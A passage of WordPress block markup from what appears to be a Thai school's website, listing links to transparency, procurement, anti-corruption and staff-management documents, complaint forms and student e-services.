href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZCEZ5hxcJ5yfJGw3L1Kz5EAXscsQ0sTV/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe 